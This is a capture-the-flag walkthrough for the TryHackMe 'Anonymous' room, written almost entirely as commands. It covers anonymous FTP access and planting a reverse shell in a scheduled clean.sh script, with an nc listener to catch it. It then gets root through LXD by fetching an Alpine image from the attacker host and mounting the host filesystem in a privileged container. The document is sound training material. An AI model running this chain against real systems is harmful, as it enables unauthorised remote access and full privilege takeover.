Anonymous
Last updated
Last updated
Room Link: https://tryhackme.com/room/anonymous
Kali
nmap -A $VICTIM
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
Kali
smbclient -L //$VICTIM/
There were just two dog pics, probably not interesting.
Kali
mkdir loot
cd loot
smbclient \\\\$VICTIM\\pics
prompt
mget *
Login using anonymous and no pass
Kali
ftp $VICTIM 21
binary
passive
cd scripts
mget *
There were these 3 files
I modified clean.sh to have a reverse shell back to my kali
Kali #1
nc -lvnp 1337
Kali #2
ftp $VICTIM 21
binary
passive
cd scripts
put clean.sh
After a few minutes the script was ran and I had a shell.
Get autocomplete
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Followed this link on lxd privilege escalation
Link: https://www.hackingarticles.in/lxd-privilege-escalation/
Victim
id
Kali
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81
Note: The command lxd init was to resolve a storage pool area issue, it may not always be needed.
Victim
cd /tmp
wget http://$KALI/alpine-v3.18-x86_64-20231111_1929.tar.gz
lxc image import ./alpine-v3.18-x86_64-20231111_1929.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id